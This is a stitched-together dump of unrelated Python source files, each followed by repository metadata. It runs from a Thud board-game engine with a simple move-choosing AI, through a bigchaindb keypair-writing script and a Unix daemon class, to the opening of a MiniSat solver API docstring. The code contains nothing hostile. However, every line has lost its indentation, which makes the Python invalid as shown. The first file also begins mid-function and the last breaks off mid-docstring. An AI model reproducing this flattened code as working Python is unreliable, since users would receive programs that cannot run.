if not i % self.BOARD_WIDTH: print()
print(str(v).rjust(2), end='')
def get_default_positions(self, token, ruleset):
"""Returns the starting positions of a given token"""
def playable():
nonlocal ruleset
pos = []
if ruleset == 'klash': dist_from_center = [0,0,2,3,4,5,6,6,6,6,6,5,4,3,2,0,0]
else: dist_from_center = [0,2,3,4,5,6,7,7,7,7,7,6,5,4,3,2,0]
for i, v in enumerate(dist_from_center):
if v:
for j in range(-v,v+1):
pos.append((i,(self.BOARD_WIDTH//2)+j))
return pos
def thudstone():
return [(8,8)]
def troll():
nonlocal ruleset
return {
'classic': [(7,7),(8,7),(9,7),
(7,8), (9,8),
(7,9),(8,9),(9,9)],
'kvt': [(6,2),(8,2),(10,2),
(5,3),(6,3),(8,3),(10,3),(11,3)],
'klash': []
}[ruleset]
def dwarf():
nonlocal ruleset
return {
'classic': [(6,1), (7,1), (9,1), (10,1),
(5,2), (11,2),(4,3), (12,3),
(3,4), (13,4),(2,5), (14,5),
(1,6), (15,6),(1,7), (15,7),
(1,9), (15,9),(1,10), (15,10),
(2,11), (14,11),(3,12), (13,12),
(4,13), (12,13),(5,14), (11,14),
(6,15), (7,15), (9,15), (10,15) ],
'kvt': [(8, 9), (1, 10), (15, 10), \
(2,11), (14,11), \
(3,12), (13,12), \
(4,13), (12,13), \
(5,14), (11,14), \
(6,15), (7 ,15), (8,15), (9,15), (10,15) ],
'klash':[(6, 2), (7, 2), (9, 2), (10, 2), \
(5, 3), (11,3), \
(3, 5), (13,5), \
(2, 6), (14,6), \
(2, 7), (14,7), \
(2, 9), (14,9), \
(2,10), (14,10),\
(3,11), (13,11),\
(5,13), (11,13),\
(6,14), (10,14),\
(7,14), ( 9,14) ]
}[ruleset]
notations = {
'playable': playable(),
'thudstone': thudstone(),
'troll': troll(),
'dwarf': dwarf()
}[token]
return map(Ply.tuple_to_position, notations)
def get_default_board(self, board_type, ruleset='classic'):
"""
Returns a bitboard with all the positions for a token/ruleset.
This is used to increase readability, since get_default_positions
only returns positions, not a board.
"""
return Bitboard(self.get_default_positions(board_type, ruleset))
def occupied_squares(self):
"""
Shortcut bitboard of all squares currently occupied
"""
return self.dwarfs | self.trolls | self.thudstone
def token_at(self, position):
"""
Checks all bitboards to see which piece resides on the square.
"""
if int(self.trolls[position]):
return 'troll'
elif int(self.dwarfs[position]):
return 'dwarf'
elif int(self.thudstone[position]):
return 'thudstone'
elif int(self.playable[position]):
return 'empty'
def add_troll(self, pos):
"""
Klash-use only. Adds a troll via bitboard, but also increments
Klash materialized max count.
"""
self.trolls |= Bitboard([pos])
self.klash_trolls += 1
def apply_ply(self, ply):
"""
Processes a ply through each bitboard.
"""
if ply.token == 'troll':
self.trolls = self.trolls & ~Bitboard([ply.origin]) | Bitboard([ply.dest])
self.dwarfs = self.dwarfs & ~Bitboard(ply.captured)
elif ply.token == 'dwarf':
self.dwarfs = self.dwarfs & ~Bitboard([ply.origin]) | Bitboard([ply.dest])
self.trolls = self.trolls & ~Bitboard(ply.captured)
elif ply.token == 'thudstone':
self.thudstone = self.thudstone & ~Bitboard([ply.origin]) | Bitboard([ply.dest])
def cycle_direction(self):
"""
A generator yielding all 8 outward directions.
"""
for i in [-self.BOARD_WIDTH-1, -self.BOARD_WIDTH, -self.BOARD_WIDTH+1,
self.BOARD_WIDTH-1, self.BOARD_WIDTH, self.BOARD_WIDTH+1,
-1, 1]:
yield i
def get_delta(self, origin, dest):
"""
Determines the general direction of two locations.
Works on all input but does not guarantee precision.
Will return (-1,0,1) x (-1,0,1).
"""
delta_file = (dest[0] > origin[0]) - (dest[0] < origin[0])
delta_rank = (dest[1] > origin[1]) - (dest[1] < origin[1])
return (delta_file, delta_rank)
def delta_to_direction(self, delta):
"""
Translate a general direction (get_delta) into a usable direction
"""
return {
(-1,-1): -self.BOARD_WIDTH-1,
( 0,-1): -self.BOARD_WIDTH,
( 1,-1): -self.BOARD_WIDTH+1,
(-1, 0): -1,
( 0, 0): 0,
( 1, 0): 1,
(-1, 1): self.BOARD_WIDTH-1,
( 0, 1): self.BOARD_WIDTH,
( 1, 1): self.BOARD_WIDTH+1
}[delta]
def get_direction(self, origin, dest):
"""
Readability function to take two locations amd return a discrete direction,
with limited accuracy.
"""
delta = self.get_delta(Ply.position_to_tuple(origin), Ply.position_to_tuple(dest))
return self.delta_to_direction(delta)
def check_if_all(self, seq, token):
"""
Function returns true if all members in seq are of token type.
"""
for i in filter(lambda x: x != token, seq):
return False
return True
def get_range(self, origin, dest):
"""
Returns a list of tokens from and including origin to dest.
"""
direction = self.get_direction(origin, dest)
pc_range = []
for i in range(origin, dest + direction, direction):
pc_range.append(self.token_at(i))
return pc_range
def tokens_adjacent(self, position, token):
"""
Returns a list of a given token adjacent to a position.
"""
capturable = []
for d in filter(lambda x: self.token_at(position+x) == token, \
self.cycle_direction()):
capturable.append(position+d)
return capturable
def validate_move(self, origin, dest, testmoves=True, testcaps=True):
"""
Master fucntion--receives two locations and determines validity of move/capture.
Function will check origin piece and automatically use applicable logic
for movement and captures.
"""
def is_materializing(origin, dest):
"""
If true, the move attempted is to materialize a troll in KLASH
"""
if origin == dest and \
(len(self.ply_list) % 2 and 'troll') and \
self.token_at(origin) == 'empty' and \
origin in self.get_default_positions('troll', 'classic'):
return True
def is_dumb(origin, dest):
"""
If true, the move is invalid under all circumstance and games.
Exception is is_materializing which must be called prior to this.
"""
try:
if not Bitboard([origin]) & self.playable:
return True
elif not Bitboard([dest]) & self.playable:
return True
elif origin == dest:
return True
else:
t_origin, t_dest = Ply.position_to_tuple(origin), Ply.position_to_tuple(dest)
if t_origin[0] - t_dest[0] and t_origin[1] - t_dest[1]:
if abs(t_origin[0] - t_dest[0]) != abs(t_origin[1] - t_dest[1]):
return True
except:
return True
def must_be_jump(position):
"""
In KVT, if trolls successfully capture,
trolls may only move again to capture or end turn.
"""
if self.ply_list and \
self.ply_list[-1].token == 'troll' and \
self.ply_list[-1].captured and \
int(self.trolls[position]):
return True
def is_valid_cap_kvt(origin, dest):
"""
Checks if a capture is valid in KVT
"""
capturable = []
if int(self.dwarfs[origin]):
for i in self.tokens_adjacent(dest, 'troll'):
direction = self.get_direction(dest, i)
seq = self.get_range(dest, dest + direction + direction)
if seq == ['empty', 'troll', 'dwarf']:
capturable.append(dest + direction)
return capturable
elif int(self.trolls[origin]):
if self.get_range(origin, dest) == ['troll', 'dwarf', 'empty']:
return [origin + self.get_direction(origin, dest)]
return []
def is_valid_cap_normal(origin, dest):
"""
Checks if a capture is valid in normal/klash
"""
verified, capturable = [], []
if int(self.dwarfs[origin]):
seq = self.get_range(origin, dest)
if seq.pop(-1) == 'troll' and seq.pop(0) == 'dwarf':
if not len(seq):
return [dest]
if self.check_if_all(seq, 'empty'):
direction = self.get_direction(dest, origin)
if is_dumb(origin, origin + direction * len(seq)):
return []
newseq = self.get_range(origin, origin + direction * len(seq))
if self.check_if_all(newseq, 'dwarf'):
return [dest]
elif int(self.trolls[origin]):
seq = self.get_range(origin, dest)
if seq.pop(-1) == 'empty' and seq.pop(0) == 'troll':
capturable = self.tokens_adjacent(dest, 'dwarf')
if not capturable: return []
elif not seq: return capturable
elif self.check_if_all(seq, 'empty'):
direction = self.get_direction(dest, origin)
if is_dumb(origin, origin + direction * len(seq)):
return []
newseq = self.get_range(origin, origin + direction * len(seq))
if self.check_if_all(newseq, 'troll'):
return capturable
return []
def is_valid_move(origin, dest):
"""Performs all logic for all rulesets about movement of pieces"""
def max_troll_move():
"""Returns the number of moves a troll may make in current ruleset"""
return {
'classic': 1,
'klash': 1,
'kvt': 3
}[self.ruleset]
squares = self.get_range(origin, dest)
if squares[0] == 'dwarf':
del squares[0]
if not self.check_if_all(squares, 'empty'):
return False
elif squares[0] == 'troll':
del squares[0]
if len(squares) > max_troll_move():
return False
if not self.check_if_all(squares, 'empty'):
return False
elif squares[0] == 'thudstone':
if not len(squares) == 2 or not squares[1] == 'empty':
return False
count, count2 = 0, 0
for i in self.cycle_direction():
if self.dwarfs[origin+i]:
count += 1
if self.dwarfs[dest+i]:
count2 += 1
if count < 2 or count2 < 2:
return False
return True
move, cap = None, None
if self.ruleset == 'klash' and \
is_materializing(origin, dest):
return (False, False, [origin])
if is_dumb(origin, dest):
return (False, False, [])
if testmoves:
move = is_valid_move(origin, dest)
if testcaps:
if self.ruleset == 'kvt':
cap = is_valid_cap_kvt(origin, dest)
else:
cap = is_valid_cap_normal(origin, dest)
if self.ruleset == 'kvt' and \
must_be_jump(origin) and \
not cap:
return (False, False, [])
return (move, bool(cap), cap)
def get_game_outcome(self):
"""Returns a string of the winning agent"""
def check_rout(token):
board = {
'dwarf': self.dwarfs,
'troll': self.trolls
}[token]
return not board
def check_mobilized():
"""Iterate through network of dwarfs to see if all are physically connected"""
def unique(pos_list):
checked = []
for i in filter(lambda x: x not in checked, pos_list):
checked.append(i)
return checked
pieces = self.dwarfs.get_bits()
openset = [next(pieces)]
closedset = []
while len(openset):
closedset.append(openset[0])
for i in self.tokens_adjacent(openset[0], 'dwarf'):
if i not in closedset:
openset.append(i)
del openset[0]
if len(unique(closedset)) == len(self.dwarfs):
return True
def check_thudstone_saved():
"""Dwarf win if thudstone successfuly moved to top of board"""
goal_squares = list(map(Ply.tuple_to_position, [(6,1),(7,1),(8,1),(9,1),(10,1)]))
if list(self.thudstone.get_bits())[0] in goal_squares:
return True
def check_thudstone_captured():
"""Troll win if thudstone surrounded by 3 trolls"""
if len(self.tokens_adjacent(list(self.thudstone.get_bits())[0], 'troll')) >= 3:
return True
def klash_win_conditions():
if self.turn_to_act() == 'troll' and \
self.klash_trolls == 6 and \
check_rout('troll'):
return 'dwarf'
elif self.turn_to_act() == 'dwarf' and \
check_rout('dwarf'):
return 'troll'
elif self.turn_to_act() == 'troll' and \
check_mobilized():
return 'dwarf'
def classic_win_conditions():
if self.turn_to_act() == 'troll' and \
check_rout('troll'):
return 'dwarf'
elif self.turn_to_act() == 'dwarf' and \
check_rout('dwarf'):
return 'troll'
def kvt_win_conditions():
if self.turn_to_act() == 'troll' and \
check_rout('troll'):
return 'dwarf'
elif self.turn_to_act() == 'dwarf' and \
check_rout('dwarf'):
return 'troll'
elif check_thudstone_saved():
return 'dwarf'
elif self.turn_to_act() == 'dwarf' and \
check_thudstone_captured():
return 'troll'
if self.ruleset == 'classic':
return classic_win_conditions()
elif self.ruleset == 'kvt':
return kvt_win_conditions()
elif self.ruleset == 'klash':
return klash_win_conditions()
def make_set(self, direction, distance, destinations):
"""Converts bitboard-data points into usable ply-pairs"""
pairs = []
for i in destinations:
#origin, destination, direction
pairs.append((i-(direction*distance), i, direction))
return pairs
def find_moves(self, token):
"""
Yields all possible moves for ALL pieces of a token.
Bitboards can hold all the logic necessary that validate_move
is no neccessary.
"""
def max_movement():
nonlocal token
return {
'troll': 1,
'dwarf': 15,
'thudstone': 0
}[token]
all_moves = []
max_dist = max_movement()
for d in self.cycle_direction():
shift = {
'troll': copy.deepcopy(self.trolls),
'dwarf': copy.deepcopy(self.dwarfs),
'thudstone': copy.deepcopy(self.thudstone),
}[token]
for dist in range(1, max_dist+1):
if d > 0:
shift = (shift >> d) & ~self.occupied_squares() & self.playable
elif d < 0:
shift = (shift << abs(d)) & ~self.occupied_squares() & self.playable
moves = self.make_set(d, dist, frozenset(shift.get_bits()))
if not moves: break
for i in moves:
yield Ply(token, i[0], i[1], [])
def find_caps(self, token):
"""
Yields all possible captures for ALL pieces of a token.
Due to the nature of capturing, this function also executes validate_move
to remove bitboard positives that are illegal.
"""
all_moves = []
for d in self.cycle_direction():
shift = {
'troll': copy.deepcopy(self.trolls),
'dwarf': copy.deepcopy(self.dwarfs),
'thudstone': copy.deepcopy(self.thudstone),
}[token]
for dist in range(1, 7):
if token == 'troll':
if d > 0:
shift = (shift >> d) & ~self.occupied_squares() & self.playable
elif d < 0:
shift = (shift << abs(d)) & ~self.occupied_squares() & self.playable
moves = self.make_set(d, dist, frozenset(shift.get_bits()))
if not moves: break
for i in moves:
result = self.validate_move(i[0], i[1], False, True)
if result[1]:
yield Ply(token, i[0], i[1], result[2])
elif token == 'dwarf':
if d > 0:
shift = (shift >> d) & self.playable & (~self.occupied_squares() | self.trolls)
elif d < 0:
shift = (shift << abs(d)) & self.playable & (~self.occupied_squares() | self.trolls)
moves = self.make_set(d, dist, frozenset(shift.get_bits()))
if not moves: break
for i in moves:
if int(self.trolls[i[1]]):
result = self.validate_move(i[0], i[1], False, True)
if result[1]:
yield Ply(token, i[0], i[1], result[2])
def find_setups(self, token, other_map=None):
"""
Yields all possible setups for ALL pieces of a token.
Dwarf strategy minimally relies on this, and therefore it has not been implemented.
"""
def pieces_within_reach(dest, pcs_locked):
"""
Determines if pieces are availble to move into deficit areas
that are not already relied on for the capture
"""
nonlocal token
if token == 'troll':
available = set(self.trolls.get_bits()).difference(pcs_locked)
elif token == 'dwarf':
available = set(self.dwarfs.get_bits()).difference(pcs_locked)
reachable = []
for i in available:
if self.validate_move(i, dest, True, False)[0]:
reachable.append(i)
return reachable
def find_valid_solutions(ply):
"""
Checks each potential setup and determines if piece
may be added to front or back of line to be valid
"""
nonlocal token
valid_support_plies, support_ready = [], []
if token == 'troll':
squares = self.get_range(ply.origin, ply.dest)
squares.pop(0)
squares.pop(-1)
if not self.check_if_all(squares, 'empty'):
return []
direction = self.get_direction(ply.dest, ply.origin)
iterator = ply.origin
while int(self.trolls[iterator]):
support_ready.append(iterator)
iterator += direction
deficiency = len(squares) - len(support_ready)
#if line is short one, support required is ONE of the two -- back or front
if deficiency == 1:
support_reqd = [support_ready[0] - direction, support_ready[-1] + direction]
#if line is short two, support required MUST be front, else requires too many moves to care
elif deficiency == 2:
support_reqd = [support_ready[0] - direction]
else:
return []
for i in support_reqd:
support_verified = pieces_within_reach(i, support_ready)
for p in support_verified:
valid_support_plies.append(Ply('troll', p, i, []))
elif token == 'dwarf':
squares = self.get_range(ply.origin, ply.dest)
if len(squares) == 3:
direction = self.get_direction(ply.dest, ply.origin)
support_reqd = ply.origin + direction
support_verified = pieces_within_reach(support_reqd, [ply.origin])
elif len(squares) == 4:
direction = self.get_direction(ply.origin, ply.dest)
support_reqd = ply.origin + direction
support_verified = pieces_within_reach(support_reqd, [ply.origin])
else:
return []
for p in support_verified:
valid_support_plies.append(Ply('dwarf', p, support_reqd, []))
return valid_support_plies
def find_potential_setups():
"""
Locate pieces that have potential attacks in each direction.
Eliminates lines that require more than 1 pc to complete.
"""
nonlocal token
nonlocal other_map
for d in self.cycle_direction():
shift = {
'troll': copy.deepcopy(self.trolls),
'dwarf': copy.deepcopy(self.dwarfs),
'thudstone': copy.deepcopy(self.thudstone),
}[token]
for dist in range(1, 15):
if token == 'troll':
if d > 0:
shift = Bitboard.create(shift.value >> d) & self.playable & (~self.occupied_squares() | self.dwarfs)
elif d < 0:
shift = Bitboard.create(shift.value << abs(d)) & self.playable & (~self.occupied_squares() | self.dwarfs)
moves = self.make_set(d, dist, frozenset(shift.get_bits()))
if not moves: break
for i in moves:
if int(self.dwarfs[i[1]]):
yield Ply('troll', i[0], i[1], [])
if token == 'dwarf':
if not other_map: return
if d > 0:
shift = (shift >> d) & self.playable & (~self.occupied_squares() | other_map)
elif d < 0:
shift = (shift << abs(d)) & self.playable & (~self.occupied_squares() | other_map)
moves = self.make_set(d, dist, frozenset(shift.get_bits()))
if not moves: break
for i in moves:
if int(other_map[i[1]]):
yield Ply(token, i[0], i[1], [])
for i in find_potential_setups():
for v in find_valid_solutions(i):
yield v
class AIEngine(threading.Thread):
def __init__(self, board):
self.board = copy.deepcopy(board)
self.moves = []
self.threats = []
self.setups = []
def apply(self, ply_list):
"""Apply a ply to a board"""
for p in ply_list:
self.board.apply_ply(p)
self.board.ply_list.append(p)
def score(self, token):
"""Scoring function to determine favorability of result"""
if token == 'troll':
score = len(self.board.trolls) * 4 - len(self.board.dwarfs)
score -= self.filter_threatened_pieces('troll') * 4
else:
score = len(self.board.dwarfs) - len(self.board.trolls) * 4
score -= self.filter_threatened_pieces('dwarf')
return score
def filter_adjacent_threats(self, token):
"""
Identifies enemies that are adjacent to eachother and finds all
captures to eliminate this threat. This logic *should* be called
first, e.g., trolls will lose 4 pts immediately if unattended
"""
def unique(positions):
"""Removes duplicates in list"""
checked = []
for i in filter(lambda x: x not in checked, positions):
checked.append(i)
return checked
adjacent_threats, solutions = [], []
if token == 'troll':
for t in self.board.trolls.get_bits():
adjacent_threats.extend(self.board.tokens_adjacent(t, 'dwarf'))
adjacent_threats = unique(adjacent_threats)
elif token == 'dwarf':
pass
for j in adjacent_threats:
for t in self.threats:
if j in t.captured:
solutions.append(t)
return solutions
def filter_capture_destinations(self, ply_list):
def unique(pos_list):
checked = []
for i in filter(lambda x: x not in checked, pos_list):
checked.append(i)
return checked
dest_positions = []
for p in ply_list:
dest_positions.append(p.dest)
return unique(dest_positions)
def find_line_blocks(self):
"""
Checks if a dwarf can be placed at the front of a troll line
to effectively stop a shove. Considers adjacent blocking square
as well as 1-off, which helps reduce the chances of a non-line
troll from eliminating the dwarf without interrupting the line.
"""
empties = set()
for ply in self.board.find_caps('troll'):
shove_direction = self.board.get_direction(ply.origin, ply.dest)
opposite_direction = self.board.get_direction(ply.dest, ply.origin)
for i in range(3):
if self.board.token_at(ply.origin + (opposite_direction * i)) != 'troll':
break
else:
empties.add(ply.origin + shove_direction)
empties.add(ply.origin + shove_direction + shove_direction)
available_blockers = list(self.filter_dwarfs_can_reach(empties))
best_blockers = self.filter_farthest_dwarfs(available_blockers, 0.1)
return best_blockers
def filter_threatened_pieces(self, friendly_token):
"""Counts the number of pieces that can be captured next turn hypothetically."""
def is_threatened(pos):
"""Cycles opposing token to verify capture is possible of given pos."""
if self.board.trolls[pos]:
for i in self.board.dwarfs.get_bits():
if self.board.validate_move(i, pos, False, True)[1]:
return True
elif self.board.dwarfs[pos]:
for i in self.board.trolls.get_bits():
direction = self.get_direction(i, pos)
if self.board.validate_move(i, i + direction, False, True)[1]:
return True
pieces = {
'troll': self.board.trolls,
'dwarf': self.board.dwarfs
}[friendly_token]
count = 0
for i in pieces.get_bits():
if is_threatened(i):
count += 1
return count
def nonoptimal_troll_moves(self):
"""Makes a move in a semi-educated fashion."""
def alternate_direction(general_direction):
"""
If location is occupied, choose a direction
with at least one kept vector.
This may never be execute, as it can occur
ONLY if a troll cannot move due to thudstone.
"""
candidates = []
significant_vector_f = general_direction[0] or 0
significant_vector_r = general_direction[1] or 0
if significant_vector_f and significant_vector_r:
candidates.append((significant_vector_f,0))
candidates.append((0,significant_vector_r))
elif significant_vector_f:
candidates.append((significant_vector_f,-1))
candidates.append((significant_vector_f,1))
elif significant_vector_r:
candidates.append((-1,significant_vector_r))
candidates.append((1,significant_vector_r))
return random.choice(candidates)
lowest = 100
for t in self.board.trolls.get_bits():
for d in self.board.dwarfs.get_bits():
hypotenuse = Ply.calc_pythagoras(t, d)
if hypotenuse < lowest:
lowest = hypotenuse
candidates = []
if hypotenuse == lowest:
delta = self.board.get_delta(Ply.position_to_tuple(t), \
Ply.position_to_tuple(d))
direction = self.board.delta_to_direction(delta)
while self.board.token_at(t + direction) != 'empty':
delta = alternate_direction(delta)
direction = self.board.delta_to_direction(delta)
candidates.append(Ply('troll', t, t + direction, []))
return candidates
def filter_dwarfs_can_reach(self, dense_spots):
"""
Given a set of desirable locations for dwarfs,
find which plies will satisfy this move
"""
for d in dense_spots:
for m in self.moves:
if d == m.dest:
yield m
def filter_farthest_dwarfs(self, ply_list, variance=.4):
"""
Filter out dwarfs that are near, and keep only those that are far,
so that flocking does not consist of dwarfs moving 1/2 squares only.
"""
farthest = 0
candidates = []
for i in ply_list:
farthest = max(farthest, Ply.calc_pythagoras(i.origin, i.dest))
if farthest <= math.sqrt(2):
return []
for i in ply_list:
if Ply.calc_pythagoras(i.origin,i.dest) >= farthest * (1-variance):
candidates.append(i)
return candidates
def filter_best(self, token, candidates, variance_pct=0):
"""
Goes through a list of plies and determine which results in best score
"""
for p in candidates:
scratch = AIEngine(self.board)
scratch.apply((p,))
p.score = scratch.score(token)
candidates = sorted(candidates, key=lambda v: v.score, reverse=True)
top = list(filter(lambda p: p.score >= candidates[0].score * (1-variance_pct), candidates))
if top:
return random.choice(top)
return Ply(None,None,None,None)
@staticmethod
def predict_future(board, firstply, lookahead, token):
"""
Takes a ply and goes x moves ahead, returning the score.
"""
global ai
b = AIEngine(board)
b.apply((firstply,))
for i in range(1, lookahead+1):
try:
AIEngine.calculate_best_move(b.board, b.board.turn_to_act(), 0)
except NoMoveException:
break
b.apply((ai.decision,))
return b.score(token)
@staticmethod
def select_best_future(board, plies, lookahead, token):
"""
Takes a list of plies and determines out the most favorable
"""
best_score = -101
best_ply = None
for i, ply in enumerate(plies):
score = AIEngine.predict_future(board, \
ply, \
lookahead, \
token)
if score > best_score:
best_score = score
best_ply = ply
return best_ply
@staticmethod
def calculate_best_move(board, token, lookahead=0):
"""
Takes a board position and calculates the best move for a token.
Can also be used to lookahead x moves in conjunction with predict_future.
"""
def dest_more_dense(imap, ply):
if imap[ply.dest] > imap[ply.origin]:
return True
return False
global ai
best_cap, best_setup, best_move = None, None, None
b = AIEngine(board)
if not len(b.board.dwarfs): raise NoMoveException('dwarf')
elif not len(b.board.trolls): raise NoMoveException('troll')
if token == 'troll':
ai_log.info('TROLL')
ai_log.info('turn: %d', len(b.board.ply_list) / 2)
b.threats = list(b.board.find_caps(token))
b.setups = list(b.board.find_setups(token))
immediate_threats = b.filter_adjacent_threats(token)
if immediate_threats:
ai.decision = b.filter_best(token, immediate_threats)
ai_log.info('save %i %s', ai.decision.score, ai.decision or 'x')
else:
tsb = AIEngine.select_best_future(b.board, itertools.chain(b.threats, b.setups), 0, token)
if tsb:
ai.decision = tsb
else:
ai.decision = b.filter_best(token, b.nonoptimal_troll_moves())
ai_log.info('# threats: %i', len(b.threats))
ai_log.debug('%s', ', '.join(str(s) for s in b.threats))
ai_log.info('# setups: %i', len(b.setups))
ai_log.debug('%s', ', '.join(str(s) for s in b.setups))
ai_log.info(' T: %i d: %i\n', len(b.board.trolls) * 4, len(b.board.dwarfs))
elif token == 'dwarf':
ai_log.info('DWARF')
ai_log.info('turn: %d', len(b.board.ply_list) / 2)
b.threats = list(b.board.find_caps(token))
ai.decision = b.filter_best(token, b.threats)
ai_log.info('best cap %i %s', ai.decision.score, ai.decision or 'x')
if not ai.decision:
troll_cd = b.filter_capture_destinations(list(b.board.find_caps('troll')))
b.setups = list(b.board.find_setups(token, Bitboard(troll_cd)))
b.moves = list(b.board.find_moves(token))
b.blocks = list(b.find_line_blocks())
best_setup = b.filter_best(token, b.filter_farthest_dwarfs(b.setups))
tsb = AIEngine.select_best_future(b.board, \
itertools.chain(b.threats, b.setups, b.blocks), \
lookahead, \
token)
imap = InfluenceMap(b.board.dwarfs, b.board.trolls)
empties_adjacent = []
for i in [.05, .15, .25]:
for d in imap.highest(i):
empties_adjacent.extend(b.board.tokens_adjacent(d, 'empty'))
candidates = list(b.filter_dwarfs_can_reach(empties_adjacent))
candidates = b.filter_farthest_dwarfs(candidates)
if not candidates:
continue
else:
best_move = b.filter_best(token, candidates)
break
if tsb:
ai.decision = AIEngine.select_best_future(b.board, \
[tsb, best_move], \
lookahead, \
token)
elif best_move:
ai.decision = best_move
else:
ai.decision = next(b.board.find_moves('dwarf'))
ai_log.info('# threats: %i', len(list(b.threats)))
ai_log.debug('%s', ', '.join(str(s) for s in b.threats))
ai_log.info('# setups: %i', len(b.setups))
ai_log.debug('%s', ', '.join(str(s) for s in b.setups))
ai_log.info('# moves: %i', len(b.moves))
#ai_log.debug('%s', ', '.join(str(s) for s in b.moves))
ai_log.info(' T: %i d: %i\n', len(b.board.trolls) * 4, len(b.board.dwarfs))
if not ai.decision:
raise NoMoveException(token)
ai = threading.local()
| {
"repo_name": "hexparrot/thudgame",
"path": "thud.py",
"copies": "1",
"size": "40073",
"license": "mit",
"hash": 7544303567110820000,
"line_mean": 38.6369930762,
"line_max": 134,
"alpha_frac": 0.4864622065,
"autogenerated": false,
"ratio": 4.026223249271577,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5012685455771576,
"avg_score": null,
"num_lines": null
} |
"""A Python 3 script to write a file with a specified number
of keypairs, using bigchaindb.crypto.generate_key_pair()
The written file is always named keypairs.py and it should be
interpreted as a Python 2 script.
Usage:
$ python3 write_keypairs_file.py num_pairs
Using the list in other Python scripts:
# in a Python 2 script:
from keypairs import keypairs_list
# keypairs_list is a list of (sk, pk) tuples
# sk = signing key (private key)
# pk = verifying key (public key)
"""
import argparse
from bigchaindb import crypto
# Parse the command-line arguments
desc = 'Write a set of keypairs to keypairs.py'
parser = argparse.ArgumentParser(description=desc)
parser.add_argument('num_pairs',
help='number of keypairs to write',
type=int)
args = parser.parse_args()
num_pairs = int(args.num_pairs)
# Generate and write the keypairs to keypairs.py
print('Writing {} keypairs to keypairs.py...'.format(num_pairs))
with open('keypairs.py', 'w') as f:
f.write('# -*- coding: utf-8 -*-\n')
f.write('"""A set of keypairs for use in deploying\n')
f.write('BigchainDB servers with a predictable set of keys.\n')
f.write('"""\n')
f.write('\n')
f.write('from __future__ import unicode_literals\n')
f.write('\n')
f.write('keypairs_list = [')
for pair_num in range(num_pairs):
keypair = crypto.generate_key_pair()
spacer = '' if pair_num == 0 else ' '
f.write("{}('{}',\n '{}'),\n".format(
spacer, keypair[0], keypair[1]))
f.write(' ]\n')
print('Done.')
| {
"repo_name": "charitychain/Charitychain",
"path": "Simplechaindb/clusterdeploy/write_keypairs_file.py",
"copies": "1",
"size": "1603",
"license": "apache-2.0",
"hash": 3639801397304456700,
"line_mean": 31.7142857143,
"line_max": 67,
"alpha_frac": 0.6375545852,
"autogenerated": false,
"ratio": 3.417910447761194,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9555465032961193,
"avg_score": 0,
"num_lines": 49
} |
# A Python3 version of process.py. Eventually, this should replace process.py.
class Daemon(object):
"""
A generic daemon class.
Usage: subclass the Daemon class and override the run() method
"""
def __init__(self, pidfile, redirect_output = True, stdin='/dev/null', stdout='/dev/null', stderr='/dev/null'):
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self.pidfile = pidfile
self.debug = False
self.redirect_output = redirect_output
def daemonize(self):
"""
do the UNIX double-fork magic, see Stevens' "Advanced
Programming in the UNIX Environment" for details (ISBN 0201563177)
http://www.erlenstar.demon.co.uk/unix/faq_2.html#SEC16
"""
try:
pid = os.fork()
if pid > 0:
# exit first parent
sys.exit(0)
except OSError as e:
sys.stderr.write("fork #1 failed: %d (%s)\n" % (e.errno, e.strerror))
sys.exit(1)
# decouple from parent environment
os.chdir("/")
os.setsid()
os.umask(0)
# do second fork
try:
pid = os.fork()
if pid > 0:
# exit from second parent
sys.exit(0)
except OSError as e:
sys.stderr.write("fork #2 failed: %d (%s)\n" % (e.errno, e.strerror))
sys.exit(1)
# Redirect standard file descriptors for the live webserver
# if not self.debug:
# # this discards any output.
if self.redirect_output:
sys.stdout.flush()
sys.stderr.flush()
si = file(self.stdin, 'r')
so = file(self.stdout, 'w', 1) # so = file(self.stdout, 'a+', 1)
se = file(self.stderr, 'w', 1) # se = file(self.stderr, 'a+', 1)
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
# write pidfile
atexit.register(self.delpid)
pid = str(os.getpid())
file(self.pidfile,'w+').write("%s\n" % pid)
def writepid(self):
pid = str(os.getpid())
file(self.pidfile,'w+').write("%s\n" % pid)
def delpid(self):
os.remove(self.pidfile)
def start(self):
"""
Start the daemon
"""
# Check for a pidfile to see if the daemon already runs
pid = None
if os.path.exists(self.pidfile):
try:
pf = file(self.pidfile,'r')
pid = int(pf.read().strip())
pf.close()
except IOError:
pid = None
if pid:
message = "pidfile %s already exist. Daemon already running?\n"
sys.stderr.write(message % self.pidfile)
sys.exit(1)
# Start the daemon
self.daemonize()
self.run()
def stop(self):
"""
Stop the daemon
"""
# Get the pid from the pidfile
try:
pf = file(self.pidfile,'r')
pid = int(pf.read().strip())
pf.close()
except IOError:
pid = None
if not pid:
message = "pidfile %s does not exist. Daemon not running?\n"
sys.stderr.write(message % self.pidfile)
return # not an error in a restart
# Try killing the daemon process
try:
while 1:
pgid = os.getpgid(pid)
os.killpg(pgid, SIGTERM) # let's kill the whole process tree so that there are no zombies left
# os.kill(pid, SIGTERM)
time.sleep(0.1)
except OSError as err:
err = str(err)
if err.find("No such process") > 0:
os.remove(self.pidfile)
else:
print((str(err)))
sys.exit(1)
def restart(self):
"""
Restart the daemon
"""
self.stop()
self.start()
def run(self):
"""
You should override this method when you subclass Daemon. It will be called after the process has been
daemonized by start() or restart().
""" | {
"repo_name": "Kortemme-Lab/klab",
"path": "klab/process3.py",
"copies": "1",
"size": "4264",
"license": "mit",
"hash": 9011702377435957000,
"line_mean": 29.9057971014,
"line_max": 115,
"alpha_frac": 0.5082082552,
"autogenerated": false,
"ratio": 3.99250936329588,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.500071761849588,
"avg_score": null,
"num_lines": null
} |
"""A Python API for the MiniSat_ and MiniCard_ constraint solvers.
.. _MiniSat: http://minisat.se/
.. _MiniCard: http://git.io/minicard
Classes:
Solver
An abstract base class for the other classes.
SubsetMixin
A mixin class adding 'subset' functionality to Solver subclasses.
:class:`MinisatSolver`
Solve CNF instances using MiniSat.
:class:`MinicardSolver`
Solve CNF+ (CNF plus cardinality constraints) using MiniCard.
:class:`MinisatSubsetSolver`
Solve arbitrary subsets of CNF instances and find SAT subsets / UNSAT cores.
:class:`MinicardSubsetSolver`
